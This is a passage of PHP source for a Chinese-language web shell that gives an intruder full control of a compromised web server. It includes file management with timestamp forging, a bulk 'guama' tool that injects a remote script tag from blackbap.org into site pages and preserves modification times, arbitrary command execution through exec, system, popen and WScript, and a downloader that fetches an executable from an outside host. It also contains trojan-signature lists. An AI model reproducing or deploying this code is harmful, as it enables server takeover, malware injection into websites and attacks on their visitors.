filezip($filecode,basename($array[$n]));
}
@closedir($zhizhen);
$this->out = $this->packfile();
return true;
}
return false;
}
function at($atunix = 0)
{
$unixarr = ($atunix == 0) ? getdate() : getdate($atunix);
if ($unixarr['year'] < 1980) { $unixarr['year'] = 1980; $unixarr['mon'] = 1; $unixarr['mday'] = 1; $unixarr['hours'] = 0; $unixarr['minutes'] = 0; $unixarr['seconds'] = 0; } return (($unixarr['year'] - 1980) << 25) | ($unixarr['mon'] << 21) | ($unixarr['mday'] << 16) | ($unixarr['hours'] << 11) | ($unixarr['minutes'] << 5) | ($unixarr['seconds'] >> 1);
}
function filezip($data, $name, $time = 0)
{
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->at($time));
$hexdtime = '\x'.$dtime[6].$dtime[7].'\x'.$dtime[4].$dtime[5].'\x'.$dtime[2].$dtime[3].'\x'.$dtime[0].$dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$c_len = strlen($zdata);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$this -> datasec[] = $fr;
$new_offset = strlen(implode('', $this->datasec));
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function packfile()
{
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return $data.$ctrldir.$this -> eof_ctrl_dir.pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).pack('V', strlen($ctrldir)).pack('V', strlen($data))."\x00\x00";
}
}
function File_Str($string)
{
return str_replace('//','/',str_replace('\\','/',$string));
}
function File_Size($size)
{
if($size > 1073741824) $size = round($size / 1073741824 * 100) / 100 . ' G';
elseif($size > 1048576) $size = round($size / 1048576 * 100) / 100 . ' M';
elseif($size > 1024) $size = round($size / 1024 * 100) / 100 . ' K';
else $size = $size . ' B';
return $size;
}
function File_Mode()
{
$RealPath = realpath('./');
$SelfPath = $_SERVER['PHP_SELF'];
$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/'));
return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
}
function File_Read($filename)
{
$handle = @fopen($filename,"rb");
$filecode = @fread($handle,@filesize($filename));
@fclose($handle);
return $filecode;
}
function File_Write($filename,$filecode,$filemode)
{
$key = true;
$handle = @fopen($filename,$filemode);
if(!@fwrite($handle,$filecode))
{
@chmod($filename,0666);
$key = @fwrite($handle,$filecode) ? true : false;
}
@fclose($handle);
return $key;
}
function File_Up($filea,$fileb)
{
$key = @copy($filea,$fileb) ? true : false;
if(!$key) $key = @move_uploaded_file($filea,$fileb) ? true : false;
return $key;
}
function File_Down($filename)
{
if(!file_exists($filename)) return false;
$filedown = basename($filename);
$array = explode('.', $filedown);
$arrayend = array_pop($array);
header('Content-type: application/x-'.$arrayend);
header('Content-Disposition: attachment; filename='.$filedown);
header('Content-Length: '.filesize($filename));
@readfile($filename);
exit;
}
function File_Deltree($deldir)
{
if(($mydir = @opendir($deldir)) == NULL) return false;
while(false !== ($file = @readdir($mydir)))
{
$name = File_Str($deldir.'/'.$file);
if((is_dir($name)) && ($file!='.') && ($file!='..')){@chmod($name,0777);File_Deltree($name);}
if(is_file($name)){@chmod($name,0777);@unlink($name);}
}
@closedir($mydir);
@chmod($deldir,0777);
return @rmdir($deldir) ? true : false;
}
function File_Act($array,$actall,$inver)
{
if(($count = count($array)) == 0) return '請(qǐng)選擇文(wén)件';
if($actall == 'e')
{
$zip = new packdir;
if($zip->packdir($array)){$spider = $zip->out;header("Content-type: application/unknown");header("Accept-Ranges: bytes");header("Content-length: ".strlen($spider));header("Content-disposition: attachment; filename=".$inver.";");echo $spider;exit;}
return '打包文(wén)件失敗';
}
$i = 0;
while($i < $count) { $array[$i] = urldecode($array[$i]); switch($actall) { case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '路徑錯誤'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '複制到(dào)'.$inver.'目錄'; break; case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = '删除'; break; case "c" : if(!eregi("^[0-7]{4}$",$inver)) return '屬性值錯誤'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '屬性修改爲'.$inver; break; case "d" : @touch($array[$i],strtotime($inver)); $msg = '修改時(shí)間爲'.$inver; break; } $i++; } return '所選文(wén)件'.$msg.'完畢'; } function File_Edit($filepath,$filename,$dim = '') { $THIS_DIR = urlencode($filepath); $THIS_FILE = File_Str($filepath.'/'.$filename); if(file_exists($THIS_FILE)){$FILE_TIME = @date('Y-m-d H:i:s',filemtime($THIS_FILE));$FILE_CODE = htmlspecialchars(File_Read($THIS_FILE));} else {$FILE_TIME = @date('Y-m-d H:i:s',time());$FILE_CODE = '';} print<<
查找内容:
{$FILE_CODE}
文(wén)件修改時(shí)間
END;
}
function File_Soup($p)
{
$THIS_DIR = urlencode($p);
$UP_SIZE = get_cfg_var('upload_max_filesize');
$MSG_BOX = '單個附件允許大(dà)小(xiǎo):'.$UP_SIZE.', 改名格式(new.html),如爲空(kōng),則保持原文(wén)件名.';
if(!empty($_POST['updir']))
{
if(count($_FILES['soup']) >= 1)
{
$i = 0;
foreach ($_FILES['soup']['error'] as $key => $error)
{
if ($error == UPLOAD_ERR_OK)
{
$souptmp = $_FILES['soup']['tmp_name'][$key];
if(!empty($_POST['reup'][$i]))$soupname = $_POST['reup'][$i]; else $soupname = $_FILES['soup']['name'][$key];
$MSG[$i] = File_Up($souptmp,File_Str($_POST['updir'].'/'.$soupname)) ? $soupname.'上(shàng)傳成功' : $soupname.'上(shàng)傳失敗';
}
$i++;
}
}
else
{
$MSG_BOX = '請(qǐng)選擇文(wén)件';
}
}
print<<
{$MSG_BOX}
上(shàng)傳到(dào)目錄:
附件1改名$MSG[0]
附件2改名$MSG[1]
附件3改名$MSG[2]
附件4改名$MSG[3]
附件5改名$MSG[4]
附件6改名$MSG[5]
附件7改名$MSG[6]
附件8改名$MSG[7]
END;
}
function File_a($p)
{
if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';
$MSG_BOX = '等待消息隊列';
$UP_DIR = urlencode(File_Str($p.'/..'));
$REAL_DIR = File_Str(realpath($p));
$FILE_DIR = File_Str(dirname(__FILE__));
$ROOT_DIR = File_Mode();
$THIS_DIR = urlencode(File_Str($REAL_DIR));
$NUM_D = 0;
$NUM_F = 0;
if(!empty($_POST['pfn'])){$intime = @strtotime($_POST['mtime']);$MSG_BOX = File_Write($_POST['pfn'],$_POST['pfc'],'wb') ? '編輯文(wén)件 '.$_POST['pfn'].' 成功' : '編輯文(wén)件 '.$_POST['pfn'].' 失敗';@touch($_POST['pfn'],$intime);}
if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST['ufn']; else $upfilename = $_FILES['ufp']['name'];$MSG_BOX = File_Up($_FILES['ufp']['tmp_name'],File_Str($REAL_DIR.'/'.$upfilename)) ? '上(shàng)傳文(wén)件 '.$upfilename.' 成功' : '上(shàng)傳文(wén)件 '.$upfilename.' 失敗';}
if(!empty($_POST['actall'])){$MSG_BOX = File_Act($_POST['files'],$_POST['actall'],$_POST['inver']);}
if(isset($_GET['md'])){$modfile = File_Str($REAL_DIR.'/'.$_GET['mk']); if(!eregi("^[0-7]{4}$",$_GET['md'])) $MSG_BOX = '屬性值錯誤'; else $MSG_BOX = @chmod($modfile,base_convert($_GET['md'],8,10)) ? '修改 '.$modfile.' 屬性爲 '.$_GET['md'].' 成功' : '修改 '.$modfile.' 屬性爲 '.$_GET['md'].' 失敗';}
if(isset($_GET['mn'])){$MSG_BOX = @rename(File_Str($REAL_DIR.'/'.$_GET['mn']),File_Str($REAL_DIR.'/'.$_GET['rn'])) ? '改名 '.$_GET['mn'].' 爲 '.$_GET['rn'].' 成功' : '改名 '.$_GET['mn'].' 爲 '.$_GET['rn'].' 失敗';}
if(isset($_GET['dn'])){$MSG_BOX = @mkdir(File_Str($REAL_DIR.'/'.$_GET['dn']),0777) ? '創建目錄 '.$_GET['dn'].' 成功' : '創建目錄 '.$_GET['dn'].' 失敗';}
if(isset($_GET['dd'])){$MSG_BOX = File_Deltree($_GET['dd']) ? '删除目錄 '.$_GET['dd'].' 成功' : '删除目錄 '.$_GET['dd'].' 失敗';}
if(isset($_GET['df'])){if(!File_Down($_GET['df'])) $MSG_BOX = '下(xià)載文(wén)件不存在';}
Root_CSS();
print<<
{$MSG_BOX}
---特殊目錄---網站(zhàn)根目錄本程序目錄C盤D盤E盤F盤啓動項啓動項(英)回收站(zhàn)ProgramsetchomeLocalTemp
|
上(shàng)級目錄
|
操作(zuò)
|
屬性
|
修改時(shí)間
|
大(dà)小(xiǎo)
|
END;
if(($h_d = @opendir($p)) == NULL) return false;
while(false !== ($Filename = @readdir($h_d)))
{
if($Filename == '.' or $Filename == '..') continue;
$Filepath = File_Str($REAL_DIR.'/'.$Filename);
if(is_dir($Filepath))
{
$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);
$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
$Filepath = urlencode($Filepath);
echo "\r\n".'
|
0 '.$Filename.'
|
';
$Filename = urlencode($Filename);
echo '
删除 ';
echo ' 改名
|
';
echo '
'.$Fileperm.'
|
';
echo '
'.$Filetime.'
|
';
echo '
|
'."\r\n";
$NUM_D++;
}
}
@rewinddir($h_d);
while(false !== ($Filename = @readdir($h_d)))
{
if($Filename == '.' or $Filename == '..') continue;
$Filepath = File_Str($REAL_DIR.'/'.$Filename);
if(!is_dir($Filepath))
{
$Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$Filepath);
$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);
$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
$Filesize = File_Size(@filesize($Filepath));
if($Filepath == File_Str(__FILE__)) $fname = ''.$Filename.''; else $fname = $Filename;
echo "\r\n".'
|
'.$fname.'
|
';
$Filepath = urlencode($Filepath);
$Filename = urlencode($Filename);
echo '
編輯 ';
echo ' 改名
|
';
echo '
'.$Fileperm.'
|
';
echo '
'.$Filetime.'
|
';
echo '
'.$Filesize.'
|
'."\r\n";
$NUM_F++;
}
}
@closedir($h_d);
if(!$Filetime) $Filetime = '2009-01-01 00:00:00';
print<<
目錄({$NUM_D}) / 文(wén)件({$NUM_F})
END;
return true;
}
//批量挂馬
function Guama_Pass($length)
{
$possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$str = "";
while(strlen($str) < $length) $str .= substr($possible,(rand() % strlen($possible)),1); return $str; } function Guama_Make($codea,$codeb,$codec) { return str_replace($codea,Guama_Pass($codeb),$codec); } function Guama_Auto($gp,$gt,$gl,$gc,$gm,$gf,$gi,$gk,$gd,$gb) { if(($h_d = @opendir($gp)) == NULL) return false; if($gm > 12) return false;
while(false !== ($Filename = @readdir($h_d)))
{
if($Filename == '.' || $Filename == '..') continue;
if($gl != ''){if(eregi($gl,$Filename)) continue;}
$Filepath = File_Str($gp.'/'.$Filename);
if(is_dir($Filepath) && $gb) Guama_Auto($Filepath,$gt,$gl,$gc,$gm,$gf,$gi,$gk,$gd,$gb);
if(eregi($gt,$Filename))
{
$fc = File_Read($Filepath);
if(($gk != '') && (stristr($fc,chop($gk)))) continue;
if(($gf != '') && ($gm != 0)) $gcm = Guama_Make($gf,$gm,$gc); else $gcm = $gc;
if($gd) $ftime = @filemtime($Filepath);
if($gi == 'a'){if(!stristr($fc,'')) continue; $fcm = str_replace('',"\r\n".$gcm."\r\n".'',$fc); $fcm = str_replace('',"\r\n".$gcm."\r\n".'',$fcm);}
if($gi == 'b') $fcm = $gcm."\r\n".$fc;
if($gi == 'c') $fcm = $fc."\r\n".$gcm;
echo File_Write($Filepath,$fcm,'wb') ? '成功:'.$Filepath.'
'."\r\n" : '失敗:'.$Filepath.'
'."\r\n";
if($gd) @touch($Filepath,$ftime);
ob_flush();
flush();
}
}
@closedir($h_d);
return true;
}
function Guama_b()
{
if((!empty($_POST['gp'])) && (!empty($_POST['gt'])) && (!empty($_POST['gc'])))
{
echo '
';
$_POST['gt'] = str_replace('.','\\.',$_POST['gt']);
if($_POST['inout'] == 'a') $_POST['gl'] = str_replace('.','\\.',$_POST['gl']); else $_POST['gl'] = '';
if(stristr($_POST['gc'],'[-') && stristr($_POST['gc'],'-]'))
{
$temp = explode('[-',$_POST['gc']);
$gk = $temp[0];
preg_match_all("/\[\-([^~]*?)\-\]/i",$_POST['gc'],$nc);
if(!eregi("^[0-9]{1,2}$",$nc[1][0])){echo '
異常終止'; return false;}
$gm = (int)$nc[1][0];
$gf = $nc[0][0];
}
else
{
$gk = $_POST['gc'];
$gm = 0;
$gf = '';
}
if(!isset($_POST['gx'])) $gk = '';
$gd = isset($_POST['gd']) ? true : false;
$gb = ($_POST['gb'] == 'a') ? true : false;
echo Guama_Auto($_POST['gp'],$_POST['gt'],$_POST['gl'],$_POST['gc'],$gm,$gf,$_POST['gi'],$gk,$gd,$gb) ? '
完畢' : '
異常終止';
echo '
挂馬路徑--範圍選擇--網站(zhàn)根目錄本程序目錄
文(wén)件類型--類型選擇--靜态文(wén)件腳本靜态JS文(wén)件
過濾對(duì)象開(kāi)啓關閉
挂馬代碼<script language=javascript src="http://blackbap.org/ad.js?[-6-]"></script>
變形說明(míng): 程序自(zì)動尋找[-6-]标簽,替換爲随機字符,6表示六位随機字符,最大(dà)12位,如果不變形可以不加[-6-]标簽.
示例: <script language=javascript src="http://blackbap.org/ad.js?EMTDSU"></script>
插入</head>标簽之前插入文(wén)件最頂端插入文(wén)件最末尾
智能(néng)過濾重複代碼保持文(wén)件修改時(shí)間不變
将挂馬應用(yòng)于該文(wén)件夾,子文(wén)件夾和(hé)文(wén)件僅将挂馬應用(yòng)于該文(wén)件夾
END;
return true;
}
//批量清馬
function Qingma_Auto($qp,$qt,$qc,$qd,$qb)
{
if(($h_d = @opendir($qp)) == NULL) return false;
while(false !== ($Filename = @readdir($h_d)))
{
if($Filename == '.' || $Filename == '..') continue;
$Filepath = File_Str($qp.'/'.$Filename);
if(is_dir($Filepath) && $qb) Qingma_Auto($Filepath,$qt,$qc,$qd,$qb);
if(eregi($qt,$Filename))
{
$ic = File_Read($Filepath);
if(!stristr($ic,$qc)) continue;
$ic = str_replace($qc,'',$ic);
if($qd) $ftime = @filemtime($Filepath);
echo File_Write($Filepath,$ic,'wb') ? '
成功:'.$Filepath.'
'."\r\n" : '
失敗:'.$Filepath.'
'."\r\n";
if($qd) @touch($Filepath,$ftime);
ob_flush();
flush();
}
}
@closedir($h_d);
return true;
}
function Qingma_c()
{
if((!empty($_POST['qp'])) && (!empty($_POST['qt'])) && (!empty($_POST['qc'])))
{
echo '
';
$qt = str_replace('.','\\.',$_POST['qt']);
$qd = isset($_POST['qd']) ? true : false;
$qb = ($_POST['qb'] == 'a') ? true : false;
echo Qingma_Auto($_POST['qp'],$qt,$_POST['qc'],$qd,$qb) ? '
清馬完畢' : '
異常終止';
echo '
';
return false;
}
$FILE_DIR = File_Str(dirname(__FILE__));
$ROOT_DIR = File_Mode();
print<<
清馬路徑--範圍選擇--網站(zhàn)根目錄本程序目錄
文(wén)件類型--類型選擇--靜态文(wén)件腳本+靜态JS文(wén)件
清除代碼<script language=javascript src="http://blackbap.org/ad.js"></script>
保持文(wén)件修改時(shí)間不變
将清馬應用(yòng)于該文(wén)件夾,子文(wén)件夾和(hé)文(wén)件僅将清馬應用(yòng)于該文(wén)件夾
END;
return true;
}
//批量替換
function Tihuan_Auto($tp,$tt,$th,$tca,$tcb,$td,$tb)
{
if(($h_d = @opendir($tp)) == NULL) return false;
while(false !== ($Filename = @readdir($h_d)))
{
if($Filename == '.' || $Filename == '..') continue;
$Filepath = File_Str($tp.'/'.$Filename);
if(is_dir($Filepath) && $tb) Tihuan_Auto($Filepath,$tt,$th,$tca,$tcb,$td,$tb);
$doing = false;
if(eregi($tt,$Filename))
{
$ic = File_Read($Filepath);
if($th)
{
if(!stristr($ic,$tca)) continue;
$ic = str_replace($tca,$tcb,$ic);
$doing = true;
}
else
{
preg_match_all("/href\=\"([^~]*?)\"/i",$ic,$nc);
for($i = 0;$i < count($nc[1]);$i++){if(eregi($tca,$nc[1][$i])){$ic = str_replace($nc[1][$i],$tcb,$ic);$doing = true;}} } if($td) $ftime = @filemtime($Filepath); if($doing) echo File_Write($Filepath,$ic,'wb') ? '
成功:'.$Filepath.'
'."\r\n" : '
失敗:'.$Filepath.'
'."\r\n";
if($td) @touch($Filepath,$ftime);
ob_flush();
flush();
}
}
@closedir($h_d);
return true;
}
function Tihuan_d()
{
if((!empty($_POST['tp'])) && (!empty($_POST['tt'])))
{
echo '
';
$tt = str_replace('.','\\.',$_POST['tt']);
$td = isset($_POST['td']) ? true : false;
$tb = ($_POST['tb'] == 'a') ? true : false;
$th = ($_POST['th'] == 'a') ? true : false;
if($th) $_POST['tca'] = str_replace('.','\\.',$_POST['tca']);
echo Tihuan_Auto($_POST['tp'],$tt,$th,$_POST['tca'],$_POST['tcb'],$td,$tb) ? '
替換完畢' : '
異常終止';
echo '
';
return false;
}
$FILE_DIR = File_Str(dirname(__FILE__));
$ROOT_DIR = File_Mode();
print<<
替換路徑--範圍選擇--網站(zhàn)根目錄本程序目錄
文(wén)件類型--類型選擇--靜态文(wén)件腳本+靜态JS文(wén)件
替換文(wén)件中的指定内容替換文(wén)件中的下(xià)載地址
查找内容替換成爲
保持文(wén)件修改時(shí)間不變
将替換應用(yòng)于該文(wén)件夾,子文(wén)件夾和(hé)文(wén)件僅将替換應用(yòng)于該文(wén)件夾
END;
return true;
}
//掃描木(mù)馬
function Antivirus_Auto($sp,$features,$st,$sb)
{
if(($h_d = @opendir($sp)) == NULL) return false;
$ROOT_DIR = File_Mode();
while(false !== ($Filename = @readdir($h_d)))
{
if($Filename == '.' || $Filename == '..') continue;
$Filepath = File_Str($sp.'/'.$Filename);
if(is_dir($Filepath) && $sb) Antivirus_Auto($Filepath,$features,$st);
if(eregi($st,$Filename))
{
if($Filepath == File_Str(__FILE__)) continue;
$ic = File_Read($Filepath);
foreach($features as $var => $key)
{
if(stristr($ic,$key))
{
$Fileurls = str_replace($ROOT_DIR,'http://'.$_SERVER['SERVER_NAME'].'/',$Filepath);
$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
echo '
'.$Filepath.' 【
編輯 删除 】 ';
echo ' 【 '.$Filetime.' 】
'.$var.' '."\r\n";
break;
}
}
ob_flush();
flush();
}
}
@closedir($h_d);
return true;
}
function Antivirus_e()
{
if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo '删除成功';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? '删除成功' : '删除失敗';} return false;}
if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; }
$SCAN_DIR = isset($_POST['sp']) ? $_POST['sp'] : File_Mode();
$features_php = array('eval一句話(huà)特征'=>'eval(','大(dà)馬read特征'=>'->read()','大(dà)馬readdir特征3'=>'readdir(','MYSQL自(zì)定義函數語句'=>'returns string soname','加密特征1'=>'eval(gzinflate(','加密特征2'=>'eval(base64_decode(','加密特征3'=>'base64_decode(','eval一句話(huà)2'=>'eval (','php複制特征'=>'copy($_FILES','複制特征2'=>'copy ($_FILES','上(shàng)傳特征'=>'move_uploaded_file($_FILES','上(shàng)傳特征2'=>'move_uploaded_file ($_FILES','小(xiǎo)馬特征'=>'str_replace(\'\\\\\',\'/\',');
$features_asx = array('腳本加密'=>'VBScript.Encode','加密特征'=>'#@~^','fso組件'=>'fso.createtextfile(path,true)','excute一句話(huà)'=>'execute','eval一句話(huà)'=>'eval','wscript特征'=>'F935DC22-1CF0-11D0-ADB9-00C04FD58A0B','數據庫操作(zuò)特征'=>'13709620-C279-11CE-A49E-444553540000','wscript特征'=>'WScript.Shell','fso特征'=>'0D43FE01-F093-11CF-8940-00A0C9054228','十三函數'=>'╋╁','aspx大(dà)馬特征'=>'Process.GetProcesses','aspx一句話(huà)'=>'Request.BinaryRead');
print<<
掃描路徑
木(mù)馬類型php木(mù)馬asp+aspx木(mù)馬
将掃馬應用(yòng)于該文(wén)件夾,子文(wén)件夾和(hé)文(wén)件僅将掃馬應用(yòng)于該文(wén)件夾
END;
if(!empty($_POST['sp']))
{
echo '
';
if(isset($_POST['stphp'])){$features_all = $features_php; $st = '\.php|\.inc|\;';}
if(isset($_POST['stasx'])){$features_all = $features_asx; $st = '\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';}
if(isset($_POST['stphp']) && isset($_POST['stasx'])){$features_all = array_merge($features_php,$features_asx); $st = '\.php|\.inc|\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';}
$sb = ($_POST['sb'] == 'a') ? true : false;
echo Antivirus_Auto($_POST['sp'],$features_all,$st,$sb) ? '掃描完畢' : '異常終止';
echo '
';
}
return true;
}
//搜索文(wén)件
function Findfile_Auto($sfp,$sfc,$sft,$sff,$sfb)
{
//echo $sfp.'
'.$sfc.'
'.$sft.'
'.$sff.'
'.$sfb;
if(($h_d = @opendir($sfp)) == NULL) return false;
while(false !== ($Filename = @readdir($h_d)))
{
if($Filename == '.' || $Filename == '..') continue;
if(eregi($sft,$Filename)) continue;
$Filepath = File_Str($sfp.'/'.$Filename);
if(is_dir($Filepath) && $sfb) Findfile_Auto($Filepath,$sfc,$sft,$sff,$sfb);
if($sff)
{
if(stristr($Filename,$sfc))
{
echo '
'.$Filepath.' '."\r\n";
ob_flush();
flush();
}
}
else
{
$File_code = File_Read($Filepath);
if(stristr($File_code,$sfc))
{
echo '
'.$Filepath.' '."\r\n";
ob_flush();
flush();
}
}
}
@closedir($h_d);
return true;
}
function Findfile_j()
{
if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo '删除成功';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? '删除成功' : '删除失敗';} return false;}
if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; }
$SCAN_DIR = isset($_POST['sfp']) ? $_POST['sfp'] : File_Mode();
$SCAN_CODE = isset($_POST['sfc']) ? $_POST['sfc'] : 'config';
$SCAN_TYPE = isset($_POST['sft']) ? $_POST['sft'] : '.mp3|.mp4|.avi|.swf|.jpg|.gif|.png|.bmp|.gho|.rar|.exe|.zip';
print<<
掃描路徑
過濾文(wén)件
關鍵字串搜索文(wén)件名搜索包含文(wén)字
将搜索應用(yòng)于該文(wén)件夾,子文(wén)件夾和(hé)文(wén)件僅将搜索應用(yòng)于該文(wén)件夾
END;
if((!empty($_POST['sfp'])) && (!empty($_POST['sfc'])))
{
echo '
';
$_POST['sft'] = str_replace('.','\\.',$_POST['sft']);
$sff = ($_POST['sff'] == 'a') ? true : false;
$sfb = ($_POST['sfb'] == 'a') ? true : false;
echo Findfile_Auto($_POST['sfp'],$_POST['sfc'],$_POST['sft'],$sff,$sfb) ? '搜索完畢' : '異常終止';
echo '
';
}
return true;
}
//系統信息
function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}}
function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";}
function Info_f()
{
$dis_func = get_cfg_var("disable_functions");
$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允許上(shàng)傳";
$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "
".$_SERVER['SERVER_ADMIN']."" : "
".get_cfg_var("sendmail_from")."";
if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","
",$dis_func);$dis_func = str_replace(",","
",$dis_func);}
$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
$info = array(
array("服務器時(shí)間",date("Y年m月d日 h:i:s",time())),
array("服務器域名","
".$_SERVER['SERVER_NAME'].""),
array("服務器IP地址",gethostbyname($_SERVER['SERVER_NAME'])),
array("服務器操作(zuò)系統",PHP_OS),
array("服務器操作(zuò)系統文(wén)字編碼",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
array("服務器解譯引擎",$_SERVER['SERVER_SOFTWARE']),
array("你(nǐ)的IP",getenv('REMOTE_ADDR')),
array("Web服務端口",$_SERVER['SERVER_PORT']),
array("PHP運行方式",strtoupper(php_sapi_name())),
array("PHP版本",PHP_VERSION),
array("運行于安全模式",Info_Cfg("safemode")),
array("服務器管理(lǐ)員",$adminmail),
array("本文(wén)件路徑",__FILE__),
array("允許使用(yòng) URL 打開(kāi)文(wén)件 allow_url_fopen",Info_Cfg("allow_url_fopen")),
array("允許動态加載鏈接庫 enable_dl",Info_Cfg("enable_dl")),
array("顯示錯誤信息 display_errors",Info_Cfg("display_errors")),
array("自(zì)動定義全局變量 register_globals",Info_Cfg("register_globals")),
array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),
array("程序最多允許使用(yòng)内存量 memory_limit",Info_Cfg("memory_limit")),
array("POST最大(dà)字節數 post_max_size",Info_Cfg("post_max_size")),
array("允許最大(dà)上(shàng)傳文(wén)件 upload_max_filesize",$upsize),
array("程序最長運行時(shí)間 max_execution_time",Info_Cfg("max_execution_time")."秒"),
array("被禁用(yòng)的函數 disable_functions",$dis_func),
array("phpinfo()",$phpinfo),
array("目前還有空(kōng)餘空(kōng)間diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
array("圖形處理(lǐ) GD Library",Info_Fun("imageline")),
array("IMAP電子郵件系統",Info_Fun("imap_close")),
array("MySQL數據庫",Info_Fun("mysql_close")),
array("SyBase數據庫",Info_Fun("sybase_close")),
array("Oracle數據庫",Info_Fun("ora_close")),
array("Oracle 8 數據庫",Info_Fun("OCILogOff")),
array("PREL相容語法 PCRE",Info_Fun("preg_match")),
array("PDF文(wén)檔支持",Info_Fun("pdf_close")),
array("Postgre SQL數據庫",Info_Fun("pg_close")),
array("SNMP網絡管理(lǐ)協議(yì)",Info_Fun("snmpget")),
array("壓縮文(wén)件支持(Zlib)",Info_Fun("gzclose")),
array("XML解析",Info_Fun("xml_set_object")),
array("FTP",Info_Fun("ftp_login")),
array("ODBC數據庫連接",Info_Fun("odbc_close")),
array("Session支持",Info_Fun("session_start")),
array("Socket支持",Info_Fun("fsockopen")),
);
echo '
';
for($i = 0;$i < count($info);$i++){echo '
|
'.$info[$i][0].'
|
'.$info[$i][1].'
|
'."\n";}
echo '
';
return true;
}
//執行命令
function Exec_Run($cmd)
{
$res = '';
if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);}
elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);}
elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}
elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}
elseif(@is_resource($f = @popen($cmd,"r"))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}
return $res;
}
function Exec_g()
{
$res = '回顯';
$cmd = 'dir';
if(!empty($_POST['cmd'])){$res = Exec_Run($_POST['cmd']);$cmd = $_POST['cmd'];}
print<<
命令參數--命令集合--文(wén)件列表讀取配置拷貝文(wén)件系統信息編譯文(wén)件添加管理(lǐ)用(yòng)戶列表查看(kàn)端口查看(kàn)地址複制文(wén)件FTP下(xià)載内核版本更改屬性
{$res}
END;
return true;
}
//組件接口
function Com_h()
{
$object = isset($_GET['o']) ? $_GET['o'] : 'adodb';
print<<
[ADODB.Connection] [WScript.shell] [Shell.Application] [Downloader]END;
if($object == 'downloader')
{
$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://blackbap.org/a.exe';
$Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(__FILE__).'/a.exe');
print<<
超連接
下(xià)載到(dào)
END;
if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))
{
echo '
';
$contents = @file_get_contents($_POST['durl']);
if(!$contents) echo '無法下(xià)載數據';
else echo File_Write($_POST['dpath'],$contents,'wb') ? '下(xià)載成功' : '下(xià)載失敗';
echo '
';
}
}
elseif($object == 'wscript')
{
$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir';
print<<
執行CMD命令
END;
if(!empty($_POST['cmd']))
{
echo '
';
$shell = new COM('wscript');
$exe = @$shell->exec("cmd.exe /c ".$cmd);
